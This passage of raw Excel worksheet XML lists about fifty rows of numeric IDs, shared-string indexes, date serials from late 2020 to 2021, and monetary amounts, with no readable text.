      <c r="B3277">
        <v>4965</v>
      </c>
      <c r="C3277" t="s">
        <v>7988</v>
      </c>
      <c r="D3277" t="s">
        <v>12459</v>
      </c>
      <c r="E3277">
        <v>12</v>
      </c>
      <c r="F3277" t="s">
        <v>9595</v>
      </c>
      <c r="G3277" s="1">
        <v>44168</v>
      </c>
      <c r="H3277">
        <v>50000</v>
      </c>
      <c r="I3277" t="s">
        <v>9485</v>
      </c>
      <c r="J3277" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3278" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3278">
        <v>23336</v>
      </c>
      <c r="B3278">
        <v>4862</v>
      </c>
      <c r="C3278" t="s">
        <v>7400</v>
      </c>
      <c r="D3278" t="s">
        <v>12574</v>
      </c>
      <c r="E3278">
        <v>2</v>
      </c>
      <c r="F3278" t="s">
        <v>9441</v>
      </c>
      <c r="G3278" s="1">
        <v>44200</v>
      </c>
      <c r="H3278">
        <v>100000</v>
      </c>
      <c r="J3278" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3279" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3279">
        <v>23337</v>
      </c>
      <c r="B3279">
        <v>2308</v>
      </c>
      <c r="C3279" t="s">
        <v>5579</v>
      </c>
      <c r="D3279" t="s">
        <v>12575</v>
      </c>
      <c r="E3279">
        <v>29</v>
      </c>
      <c r="F3279" t="s">
        <v>4686</v>
      </c>
      <c r="G3279" s="1">
        <v>44181</v>
      </c>
      <c r="H3279">
        <v>21000</v>
      </c>
      <c r="J3279" t="s">
        <v>12576</v>
      </c>
    </row>
    <row r="3280" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3280">
        <v>23340</v>
      </c>
      <c r="B3280">
        <v>1462</v>
      </c>
      <c r="C3280" t="s">
        <v>3904</v>
      </c>
      <c r="D3280" t="s">
        <v>12577</v>
      </c>
      <c r="E3280">
        <v>4</v>
      </c>
      <c r="F3280" t="s">
        <v>12578</v>
      </c>
      <c r="G3280" s="1">
        <v>44175</v>
      </c>
      <c r="H3280">
        <v>25000</v>
      </c>
      <c r="J3280" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3281" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3281">
        <v>23341</v>
      </c>
      <c r="B3281">
        <v>1462</v>
      </c>
      <c r="C3281" t="s">
        <v>3904</v>
      </c>
      <c r="D3281" t="s">
        <v>12577</v>
      </c>
      <c r="E3281">
        <v>4</v>
      </c>
      <c r="F3281" t="s">
        <v>12579</v>
      </c>
      <c r="G3281" s="1">
        <v>44175</v>
      </c>
      <c r="H3281">
        <v>25000</v>
      </c>
      <c r="J3281" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3282" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3282">
        <v>23342</v>
      </c>
      <c r="B3282">
        <v>1462</v>
      </c>
      <c r="C3282" t="s">
        <v>3904</v>
      </c>
      <c r="D3282" t="s">
        <v>12577</v>
      </c>
      <c r="E3282">
        <v>4</v>
      </c>
      <c r="F3282" t="s">
        <v>3814</v>
      </c>
      <c r="G3282" s="1">
        <v>44175</v>
      </c>
      <c r="H3282">
        <v>15000</v>
      </c>
      <c r="J3282" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3283" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3283">
        <v>23343</v>
      </c>
      <c r="B3283">
        <v>1462</v>
      </c>
      <c r="C3283" t="s">
        <v>3904</v>
      </c>
      <c r="D3283" t="s">
        <v>12577</v>
      </c>
      <c r="E3283">
        <v>4</v>
      </c>
      <c r="F3283" t="s">
        <v>7057</v>
      </c>
      <c r="G3283" s="1">
        <v>44175</v>
      </c>
      <c r="H3283">
        <v>10000</v>
      </c>
      <c r="J3283" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3284" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3284">
        <v>23344</v>
      </c>
      <c r="B3284">
        <v>1462</v>
      </c>
      <c r="C3284" t="s">
        <v>3904</v>
      </c>
      <c r="D3284" t="s">
        <v>12577</v>
      </c>
      <c r="E3284">
        <v>4</v>
      </c>
      <c r="F3284" t="s">
        <v>9577</v>
      </c>
      <c r="G3284" s="1">
        <v>44175</v>
      </c>
      <c r="H3284">
        <v>20000</v>
      </c>
      <c r="J3284" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3285" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3285">
        <v>23345</v>
      </c>
      <c r="B3285">
        <v>1462</v>
      </c>
      <c r="C3285" t="s">
        <v>3904</v>
      </c>
      <c r="D3285" t="s">
        <v>12577</v>
      </c>
      <c r="E3285">
        <v>4</v>
      </c>
      <c r="F3285" t="s">
        <v>764</v>
      </c>
      <c r="G3285" s="1">
        <v>44175</v>
      </c>
      <c r="H3285">
        <v>10000</v>
      </c>
      <c r="J3285" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3286" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3286">
        <v>23346</v>
      </c>
      <c r="B3286">
        <v>1462</v>
      </c>
      <c r="C3286" t="s">
        <v>3904</v>
      </c>
      <c r="D3286" t="s">
        <v>12577</v>
      </c>
      <c r="E3286">
        <v>4</v>
      </c>
      <c r="F3286" t="s">
        <v>9640</v>
      </c>
      <c r="G3286" s="1">
        <v>44175</v>
      </c>
      <c r="H3286">
        <v>10000</v>
      </c>
      <c r="J3286" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3287" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3287">
        <v>23347</v>
      </c>
      <c r="B3287">
        <v>1462</v>
      </c>
      <c r="C3287" t="s">
        <v>3904</v>
      </c>
      <c r="D3287" t="s">
        <v>12577</v>
      </c>
      <c r="E3287">
        <v>4</v>
      </c>
      <c r="F3287" t="s">
        <v>9527</v>
      </c>
      <c r="G3287" s="1">
        <v>44175</v>
      </c>
      <c r="H3287">
        <v>15000</v>
      </c>
      <c r="J3287" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3288" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3288">
        <v>23348</v>
      </c>
      <c r="B3288">
        <v>5136</v>
      </c>
      <c r="C3288" t="s">
        <v>8147</v>
      </c>
      <c r="D3288" t="s">
        <v>12580</v>
      </c>
      <c r="E3288">
        <v>16</v>
      </c>
      <c r="F3288" t="s">
        <v>3341</v>
      </c>
      <c r="G3288" s="1">
        <v>44379</v>
      </c>
      <c r="H3288">
        <v>2000</v>
      </c>
      <c r="I3288" t="s">
        <v>12581</v>
      </c>
    </row>
    <row r="3289" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3289">
        <v>23349</v>
      </c>
      <c r="B3289">
        <v>5136</v>
      </c>
      <c r="C3289" t="s">
        <v>8147</v>
      </c>
      <c r="D3289" t="s">
        <v>12580</v>
      </c>
      <c r="E3289">
        <v>16</v>
      </c>
      <c r="F3289" t="s">
        <v>6569</v>
      </c>
      <c r="G3289" s="1">
        <v>44379</v>
      </c>
      <c r="H3289">
        <v>5000</v>
      </c>
      <c r="I3289" t="s">
        <v>12582</v>
      </c>
    </row>
    <row r="3290" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3290">
        <v>23350</v>
      </c>
      <c r="B3290">
        <v>5086</v>
      </c>
      <c r="C3290" t="s">
        <v>8037</v>
      </c>
      <c r="D3290" t="s">
        <v>12583</v>
      </c>
      <c r="E3290">
        <v>2</v>
      </c>
      <c r="F3290" t="s">
        <v>12584</v>
      </c>
      <c r="G3290" s="1">
        <v>44200</v>
      </c>
      <c r="H3290">
        <v>300000</v>
      </c>
      <c r="I3290" t="s">
        <v>12585</v>
      </c>
    </row>
    <row r="3291" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3291">
        <v>23353</v>
      </c>
      <c r="B3291">
        <v>1199</v>
      </c>
      <c r="C3291" t="s">
        <v>3708</v>
      </c>
      <c r="D3291" t="s">
        <v>12586</v>
      </c>
      <c r="E3291">
        <v>12</v>
      </c>
      <c r="F3291" t="s">
        <v>4686</v>
      </c>
      <c r="G3291" s="1">
        <v>44182</v>
      </c>
      <c r="H3291">
        <v>50000</v>
      </c>
      <c r="J3291" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3292" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3292">
        <v>23354</v>
      </c>
      <c r="B3292">
        <v>563</v>
      </c>
      <c r="C3292" t="s">
        <v>1821</v>
      </c>
      <c r="D3292" t="s">
        <v>11856</v>
      </c>
      <c r="E3292">
        <v>24</v>
      </c>
      <c r="F3292" t="s">
        <v>673</v>
      </c>
      <c r="G3292" s="1">
        <v>44204</v>
      </c>
      <c r="H3292">
        <v>2000000</v>
      </c>
      <c r="J3292" t="s">
        <v>12587</v>
      </c>
    </row>
    <row r="3293" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3293">
        <v>23355</v>
      </c>
      <c r="B3293">
        <v>563</v>
      </c>
      <c r="C3293" t="s">
        <v>1821</v>
      </c>
      <c r="D3293" t="s">
        <v>11856</v>
      </c>
      <c r="E3293">
        <v>24</v>
      </c>
      <c r="F3293" t="s">
        <v>9441</v>
      </c>
      <c r="G3293" s="1">
        <v>44204</v>
      </c>
      <c r="H3293">
        <v>36000</v>
      </c>
      <c r="J3293" t="s">
        <v>12154</v>
      </c>
    </row>
    <row r="3294" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3294">
        <v>23356</v>
      </c>
      <c r="B3294">
        <v>563</v>
      </c>
      <c r="C3294" t="s">
        <v>1821</v>
      </c>
      <c r="D3294" t="s">
        <v>11856</v>
      </c>
      <c r="E3294">
        <v>24</v>
      </c>
      <c r="F3294" t="s">
        <v>11520</v>
      </c>
      <c r="G3294" s="1">
        <v>44204</v>
      </c>
      <c r="H3294">
        <v>1800000</v>
      </c>
      <c r="J3294" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3295" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3295">
        <v>23357</v>
      </c>
      <c r="B3295">
        <v>563</v>
      </c>
      <c r="C3295" t="s">
        <v>1821</v>
      </c>
      <c r="D3295" t="s">
        <v>11856</v>
      </c>
      <c r="E3295">
        <v>24</v>
      </c>
      <c r="F3295" t="s">
        <v>9470</v>
      </c>
      <c r="G3295" s="1">
        <v>44204</v>
      </c>
      <c r="H3295">
        <v>20000</v>
      </c>
      <c r="J3295" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3296" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3296">
        <v>23358</v>
      </c>
      <c r="B3296">
        <v>563</v>
      </c>
      <c r="C3296" t="s">
        <v>1821</v>
      </c>
      <c r="D3296" t="s">
        <v>11856</v>
      </c>
      <c r="E3296">
        <v>24</v>
      </c>
      <c r="F3296" t="s">
        <v>12588</v>
      </c>
      <c r="G3296" s="1">
        <v>44204</v>
      </c>
      <c r="H3296">
        <v>25000</v>
      </c>
      <c r="J3296" t="s">
        <v>9554</v>
      </c>
    </row>
    <row r="3297" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3297">
        <v>23359</v>
      </c>
      <c r="B3297">
        <v>1199</v>
      </c>
      <c r="C3297" t="s">
        <v>3708</v>
      </c>
      <c r="D3297" t="s">
        <v>12586</v>
      </c>
      <c r="E3297">
        <v>12</v>
      </c>
      <c r="F3297" t="s">
        <v>2236</v>
      </c>
      <c r="G3297" s="1">
        <v>44182</v>
      </c>
      <c r="H3297">
        <v>150000</v>
      </c>
      <c r="J3297" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3298" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3298">
        <v>23361</v>
      </c>
      <c r="B3298">
        <v>1199</v>
      </c>
      <c r="C3298" t="s">
        <v>3708</v>
      </c>
      <c r="D3298" t="s">
        <v>12586</v>
      </c>
      <c r="E3298">
        <v>12</v>
      </c>
      <c r="F3298" t="s">
        <v>12589</v>
      </c>
      <c r="G3298" s="1">
        <v>44182</v>
      </c>
      <c r="H3298">
        <v>0</v>
      </c>
      <c r="J3298" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3299" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3299">
        <v>23362</v>
      </c>
      <c r="B3299">
        <v>1199</v>
      </c>
      <c r="C3299" t="s">
        <v>3708</v>
      </c>
      <c r="D3299" t="s">
        <v>12586</v>
      </c>
      <c r="E3299">
        <v>12</v>
      </c>
      <c r="F3299" t="s">
        <v>11027</v>
      </c>
      <c r="G3299" s="1">
        <v>44182</v>
      </c>
      <c r="H3299">
        <v>0</v>
      </c>
      <c r="J3299" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3300" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3300">
        <v>23363</v>
      </c>
      <c r="B3300">
        <v>1199</v>
      </c>
      <c r="C3300" t="s">
        <v>3708</v>
      </c>
      <c r="D3300" t="s">
        <v>12586</v>
      </c>
      <c r="E3300">
        <v>12</v>
      </c>
      <c r="F3300" t="s">
        <v>12590</v>
      </c>
      <c r="G3300" s="1">
        <v>44182</v>
      </c>
      <c r="H3300">
        <v>300000</v>
      </c>
      <c r="J3300" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3301" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3301">
        <v>23364</v>
      </c>
      <c r="B3301">
        <v>1199</v>
      </c>
      <c r="C3301" t="s">
        <v>3708</v>
      </c>
      <c r="D3301" t="s">
        <v>12586</v>
      </c>
      <c r="E3301">
        <v>12</v>
      </c>
      <c r="F3301" t="s">
        <v>12591</v>
      </c>
      <c r="G3301" s="1">
        <v>44182</v>
      </c>
      <c r="H3301">
        <v>0</v>
      </c>
      <c r="J3301" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3302" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3302">
        <v>23365</v>
      </c>
      <c r="B3302">
        <v>195</v>
      </c>
      <c r="C3302" t="s">
        <v>1852</v>
      </c>
      <c r="D3302" t="s">
        <v>12592</v>
      </c>
      <c r="E3302">
        <v>12</v>
      </c>
      <c r="F3302" t="s">
        <v>7613</v>
      </c>
      <c r="G3302" s="1">
        <v>44260</v>
      </c>
      <c r="H3302">
        <v>300000</v>
      </c>
      <c r="J3302" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3303" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3303">
        <v>23366</v>
      </c>
      <c r="B3303">
        <v>195</v>
      </c>
      <c r="C3303" t="s">
        <v>1852</v>
      </c>
      <c r="D3303" t="s">
        <v>12592</v>
      </c>
      <c r="E3303">
        <v>12</v>
      </c>
      <c r="F3303" t="s">
        <v>10387</v>
      </c>
      <c r="G3303" s="1">
        <v>44260</v>
      </c>
      <c r="H3303">
        <v>300000</v>
      </c>
      <c r="J3303" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3304" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3304">
        <v>23367</v>
      </c>
      <c r="B3304">
        <v>195</v>
      </c>
      <c r="C3304" t="s">
        <v>1852</v>
      </c>
      <c r="D3304" t="s">
        <v>12592</v>
      </c>
      <c r="E3304">
        <v>12</v>
      </c>
      <c r="F3304" t="s">
        <v>9217</v>
      </c>
      <c r="G3304" s="1">
        <v>44260</v>
      </c>
      <c r="H3304">
        <v>150000</v>
      </c>
      <c r="J3304" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3305" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3305">
        <v>23368</v>
      </c>
      <c r="B3305">
        <v>195</v>
      </c>
      <c r="C3305" t="s">
        <v>1852</v>
      </c>
      <c r="D3305" t="s">
        <v>12592</v>
      </c>
      <c r="E3305">
        <v>12</v>
      </c>
      <c r="F3305" t="s">
        <v>9466</v>
      </c>
      <c r="G3305" s="1">
        <v>44260</v>
      </c>
      <c r="H3305">
        <v>150000</v>
      </c>
      <c r="J3305" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3306" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3306">
        <v>23369</v>
      </c>
      <c r="B3306">
        <v>195</v>
      </c>
      <c r="C3306" t="s">
        <v>1852</v>
      </c>
      <c r="D3306" t="s">
        <v>12592</v>
      </c>
      <c r="E3306">
        <v>12</v>
      </c>
      <c r="F3306" t="s">
        <v>5434</v>
      </c>
      <c r="G3306" s="1">
        <v>44260</v>
      </c>
      <c r="H3306">
        <v>150000</v>
      </c>
      <c r="J3306" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3307" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3307">
        <v>23370</v>
      </c>
      <c r="B3307">
        <v>195</v>
      </c>
      <c r="C3307" t="s">
        <v>1852</v>
      </c>
      <c r="D3307" t="s">
        <v>12592</v>
      </c>
      <c r="E3307">
        <v>12</v>
      </c>
      <c r="F3307" t="s">
        <v>7211</v>
      </c>
      <c r="G3307" s="1">
        <v>44260</v>
      </c>
      <c r="H3307">
        <v>150000</v>
      </c>
      <c r="J3307" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3308" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3308">
        <v>23371</v>
      </c>
      <c r="B3308">
        <v>195</v>
      </c>
      <c r="C3308" t="s">
        <v>1852</v>
      </c>
      <c r="D3308" t="s">
        <v>12592</v>
      </c>
      <c r="E3308">
        <v>12</v>
      </c>
      <c r="F3308" t="s">
        <v>9454</v>
      </c>
      <c r="G3308" s="1">
        <v>44260</v>
      </c>
      <c r="H3308">
        <v>150000</v>
      </c>
      <c r="J3308" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3309" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3309">
        <v>23376</v>
      </c>
      <c r="B3309">
        <v>5161</v>
      </c>
      <c r="C3309" t="s">
        <v>8162</v>
      </c>
      <c r="D3309" t="s">
        <v>12593</v>
      </c>
      <c r="E3309">
        <v>16</v>
      </c>
      <c r="F3309" t="s">
        <v>12594</v>
      </c>
      <c r="G3309" s="1">
        <v>44232</v>
      </c>
      <c r="H3309">
        <v>2000</v>
      </c>
      <c r="I3309" t="s">
        <v>12595</v>
      </c>
    </row>
    <row r="3310" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3310">
        <v>23377</v>
      </c>
      <c r="B3310">
        <v>966</v>
      </c>
      <c r="C3310" t="s">
        <v>3854</v>
      </c>
      <c r="D3310" t="s">
        <v>12596</v>
      </c>
      <c r="E3310">
        <v>16</v>
      </c>
      <c r="F3310" t="s">
        <v>132</v>
      </c>
      <c r="G3310" s="1">
        <v>44211</v>
      </c>
      <c r="H3310">
        <v>561935</v>
      </c>
      <c r="I3310" t="s">
        <v>12597</v>
      </c>
      <c r="J3310" t="s">
        <v>12598</v>
      </c>
    </row>
    <row r="3311" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3311">
        <v>23378</v>
      </c>
      <c r="B3311">
        <v>5126</v>
      </c>
      <c r="C3311" t="s">
        <v>8170</v>
      </c>
      <c r="D3311" t="s">
        <v>12599</v>
      </c>
      <c r="E3311">
        <v>12</v>
      </c>
      <c r="F3311" t="s">
        <v>12600</v>
      </c>
      <c r="G3311" s="1">
        <v>44274</v>
      </c>
      <c r="H3311">
        <v>300000</v>
      </c>
      <c r="I3311" t="s">
        <v>12601</v>
      </c>
    </row>
    <row r="3312" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3312">
        <v>23379</v>
      </c>
      <c r="B3312">
        <v>5126</v>
      </c>
      <c r="C3312" t="s">
        <v>8170</v>
      </c>
      <c r="D3312" t="s">
        <v>12602</v>
      </c>
      <c r="E3312">
        <v>12</v>
      </c>
      <c r="F3312" t="s">
        <v>9925</v>
      </c>
      <c r="G3312" s="1">
        <v>44274</v>
      </c>
      <c r="H3312">
        <v>100000</v>
      </c>
      <c r="I3312" t="s">
        <v>12603</v>
      </c>
    </row>
    <row r="3313" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3313">
        <v>23380</v>
      </c>
      <c r="B3313">
        <v>5126</v>
      </c>
      <c r="C3313" t="s">
        <v>8170</v>
      </c>
      <c r="D3313" t="s">
        <v>12602</v>
      </c>
      <c r="E3313">
        <v>12</v>
      </c>
      <c r="F3313" t="s">
        <v>9437</v>
      </c>
      <c r="G3313" s="1">
        <v>44274</v>
      </c>
      <c r="H3313">
        <v>300000</v>
      </c>
      <c r="I3313" t="s">
        <v>12604</v>
      </c>
    </row>
    <row r="3314" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3314">
        <v>23382</v>
      </c>
      <c r="B3314">
        <v>5126</v>
      </c>
      <c r="C3314" t="s">
        <v>8170</v>
      </c>
      <c r="D3314" t="s">
        <v>12599</v>
      </c>
      <c r="E3314">
        <v>12</v>
      </c>
      <c r="F3314" t="s">
        <v>12605</v>
      </c>
      <c r="G3314" s="1">
        <v>44274</v>
      </c>
      <c r="H3314">
        <v>1000000</v>
      </c>
      <c r="I3314" t="s">
        <v>12606</v>
      </c>
    </row>
    <row r="3315" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3315">
        <v>23383</v>
      </c>
      <c r="B3315">
        <v>5112</v>
      </c>
      <c r="C3315" t="s">
        <v>8115</v>
      </c>
      <c r="D3315" t="s">
        <v>12607</v>
      </c>
      <c r="E3315">
        <v>9</v>
      </c>
      <c r="F3315" t="s">
        <v>1276</v>
      </c>
      <c r="G3315" s="1">
        <v>44193</v>
      </c>
      <c r="H3315">
        <v>300</v>
      </c>
      <c r="I3315" t="s">
        <v>12608</v>
      </c>
    </row>
    <row r="3316" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3316">
        <v>23384</v>
      </c>
      <c r="B3316">
        <v>5118</v>
      </c>
      <c r="C3316" t="s">
        <v>8176</v>
      </c>
      <c r="D3316" t="s">
        <v>12609</v>
      </c>
      <c r="E3316">
        <v>24</v>
      </c>
      <c r="F3316" t="s">
        <v>12610</v>
      </c>
      <c r="G3316" s="1">
        <v>44259</v>
      </c>
      <c r="H3316">
        <v>720000</v>
      </c>
      <c r="I3316" t="s">
        <v>12611</v>
      </c>
      <c r="J3316" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3317" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3317">
        <v>23385</v>
      </c>
      <c r="B3317">
        <v>1190</v>
      </c>
      <c r="C3317" t="s">
        <v>2736</v>
      </c>
      <c r="D3317" t="s">
        <v>12612</v>
      </c>
      <c r="E3317">
        <v>26</v>
      </c>
      <c r="F3317" t="s">
        <v>12613</v>
      </c>
      <c r="G3317" s="1">
        <v>44232</v>
      </c>
      <c r="H3317">
        <v>300000</v>
      </c>
      <c r="I3317" t="s">
        <v>9485</v>
      </c>
      <c r="J3317" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3318" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3318">
        <v>23386</v>
      </c>
      <c r="B3318">
        <v>1190</v>
      </c>
      <c r="C3318" t="s">
        <v>2736</v>
      </c>
      <c r="D3318" t="s">
        <v>12612</v>
      </c>
      <c r="E3318">
        <v>26</v>
      </c>
      <c r="F3318" t="s">
        <v>12614</v>
      </c>
      <c r="G3318" s="1">
        <v>44232</v>
      </c>
      <c r="H3318">
        <v>150000</v>
      </c>
      <c r="J3318" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3319" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3319">
        <v>23387</v>
      </c>
      <c r="B3319">
        <v>1190</v>
      </c>
      <c r="C3319" t="s">
        <v>2736</v>
      </c>
      <c r="D3319" t="s">
        <v>12612</v>
      </c>
      <c r="E3319">
        <v>26</v>
      </c>
      <c r="F3319" t="s">
        <v>3814</v>
      </c>
      <c r="G3319" s="1">
        <v>44232</v>
      </c>
      <c r="H3319">
        <v>150000</v>
      </c>
      <c r="I3319" t="s">
        <v>9852</v>
      </c>
      <c r="J3319" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3320" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3320">
        <v>23388</v>
      </c>
      <c r="B3320">
        <v>1190</v>
      </c>
      <c r="C3320" t="s">
        <v>2736</v>
      </c>
      <c r="D3320" t="s">
        <v>12612</v>
      </c>
      <c r="E3320">
        <v>26</v>
      </c>
      <c r="F3320" t="s">
        <v>9527</v>
      </c>
      <c r="G3320" s="1">
        <v>44232</v>
      </c>
      <c r="H3320">
        <v>1500</v>
      </c>
      <c r="J3320" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3321" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3321">
        <v>23389</v>
      </c>
      <c r="B3321">
        <v>1256</v>
      </c>
      <c r="C3321" t="s">
        <v>16490</v>
      </c>
      <c r="D3321" t="s">
        <v>16491</v>
      </c>
      <c r="E3321">
        <v>12</v>
      </c>
      <c r="F3321" t="s">
        <v>12616</v>
      </c>
      <c r="G3321" s="1">
        <v>44173</v>
      </c>
      <c r="H3321" s="4">
        <v>195000</v>
      </c>
      <c r="J3321" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="3322" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3322">
        <v>23390</v>
      </c>
      <c r="B3322">
        <v>1256</v>
      </c>
      <c r="C3322" t="s">
        <v>16490</v>
      </c>
      <c r="D3322" t="s">
        <v>16491</v>
      </c>
      <c r="E3322">
        <v>12</v>
      </c>
      <c r="F3322" t="s">
        <v>12617</v>
      </c>
      <c r="G3322" s="1">
        <v>44173</v>
      </c>
      <c r="H3322" s="4">
        <v>190000</v>
      </c>
      <c r="J3322" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="3323" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3323">
        <v>23391</v>
      </c>
      <c r="B3323">
        <v>1256</v>
      </c>
      <c r="C3323" t="s">
        <v>16490</v>
      </c>
      <c r="D3323" t="s">
        <v>16491</v>
      </c>
      <c r="E3323">
        <v>12</v>
      </c>
      <c r="F3323" t="s">
        <v>3814</v>
      </c>
      <c r="G3323" s="1">
        <v>44173</v>
      </c>
      <c r="H3323" s="4">
        <v>110000</v>
      </c>
      <c r="J3323" t="s">
        <v>12618</v>
      </c>
    </row>
    <row r="3324" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3324">
        <v>23392</v>
      </c>
      <c r="B3324">
        <v>1256</v>
      </c>
      <c r="C3324" t="s">
        <v>3873</v>
      </c>
      <c r="D3324" t="s">
        <v>12615</v>
      </c>
      <c r="E3324">
        <v>12</v>
      </c>
      <c r="F3324" t="s">
        <v>4686</v>
      </c>
      <c r="G3324" s="1">
        <v>44173</v>
      </c>
      <c r="H3324">
        <v>0</v>
      </c>
      <c r="J3324" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3325" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3325">
        <v>23393</v>
      </c>
      <c r="B3325">
        <v>21</v>
      </c>
      <c r="C3325" t="s">
        <v>16492</v>
      </c>
      <c r="D3325" t="s">
        <v>16493</v>
      </c>
      <c r="E3325">
        <v>22</v>
      </c>
      <c r="F3325" t="s">
        <v>547</v>
      </c>
      <c r="G3325" s="1">
        <v>44188</v>
      </c>
      <c r="H3325" s="4">
        <v>25000</v>
      </c>
      <c r="J3325" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3326" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3326">
        <v>23394</v>
      </c>
      <c r="B3326">
        <v>5120</v>
      </c>
      <c r="C3326" t="s">
        <v>8057</v>
      </c>
      <c r="D3326" t="s">
        <v>12619</v>
      </c>
      <c r="E3326">
        <v>22</v>
      </c>
      <c r="F3326" t="s">
        <v>1746</v>
      </c>
      <c r="G3326" s="1">
        <v>44256</v>
      </c>
      <c r="H3326">
        <v>50000</v>
      </c>
      <c r="I3326" t="s">
        <v>12620</v>
      </c>
      <c r="J3326" t="s">
        <v>12621</v>
      </c>
    </row>
    <row r="3327" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3327">
        <v>23401</v>
      </c>
      <c r="B3327">
        <v>4801</v>
      </c>
      <c r="C3327" t="s">
        <v>7368</v>
      </c>
      <c r="D3327" t="s">
        <v>11672</v>
      </c>
      <c r="E3327">
        <v>2</v>
      </c>
      <c r="F3327" t="s">
        <v>12622</v>
      </c>
      <c r="G3327" s="1">
        <v>44183</v>
      </c>
      <c r="H3327">
        <v>6000</v>
      </c>
      <c r="J3327" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="3328" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3328">
        <v>23402</v>
      </c>
      <c r="B3328">
        <v>1216</v>
      </c>
      <c r="C3328" t="s">
        <v>3601</v>
      </c>
      <c r="D3328" t="s">
        <v>12069</v>
      </c>
      <c r="E3328">
        <v>13</v>
      </c>
      <c r="F3328" t="s">
        <v>3318</v>
      </c>
      <c r="G3328" s="1">
        <v>44188</v>
      </c>
      <c r="H3328">
        <v>2500000</v>
      </c>
      <c r="I3328" t="s">
        <v>12623</v>
      </c>
    </row>
    <row r="3329" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3329">
        <v>23405</v>
      </c>
      <c r="B3329">
        <v>2813</v>
      </c>
      <c r="C3329" t="s">
        <v>8181</v>
      </c>
      <c r="D3329" t="s">
        <v>12624</v>
      </c>
      <c r="E3329">
        <v>8</v>
      </c>
      <c r="F3329" t="s">
        <v>9900</v>
      </c>
      <c r="G3329" s="1">
        <v>44172</v>
      </c>
      <c r="H3329">
        <v>3600000</v>
      </c>
    </row>
    <row r="3330" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3330">
        <v>23406</v>
      </c>
      <c r="B3330">
